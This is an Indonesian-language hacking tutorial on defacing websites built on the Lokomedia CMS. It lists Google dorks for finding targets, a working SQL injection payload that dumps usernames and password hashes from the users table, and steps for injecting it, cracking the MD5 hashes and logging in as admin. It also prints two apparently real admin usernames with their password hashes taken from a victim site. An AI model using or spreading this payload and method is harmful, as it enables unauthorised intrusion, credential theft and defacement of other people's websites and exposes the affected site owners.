DEFACE METODE SQL LOKOMEDIA

alo gaess..
kali ini gw mau kasih tutorial cara deface metode SQL Lokomedia.
ok langsung aja caranya.

- Bahan :

Dork :

- inurl:/statis-1-sejarah.html
- inurl:/statis-1-profil.html

Exploit :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

MD5 Decrypt tools, kalean bisa kunjungi disini

- Tutorial :
1. Dorking dengan dork yang sudah saya sediakan diatas.
2. Pilih salah satu target kalian, dua aja gaapa kok xD.
3. setelah itu masukkan Exploitnya ( diatas sudah ada ) di bagian url webnya.

Contoh : site.com/statis-1-profil.html

jadi : site.com/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. setelah dimasukkan exploitnya, cek apakah vuln ato tidak, caranya ? cek gambar.

5. nah kalo dah di cek, tekan tomblok CTRL + U nanti keluar view-source webnya, jadinya ntar kek gini.

6. setelah ketemu user & pass admin loginnya,

user : tfrapi2016

pass : 01e34cc10e65e56cece50e196635f20a

user : orientasireza

pass : b88b8e489fd96ea5b815aea1f4b4a8ea
7. kalian tinggal Decrypt passwordnya di MD5 Decrypt ( sudah saya sediakan diatas ).
8. setelah di decrypt passwordnya kalian tinggal cari Admin Login nya.
9. Untuk mencari admin login nya bisa dengan cara manual atau pakai tools.

*terimakasih atas perhatiannya, mohon maaf kalo ada salah kata.
~Admin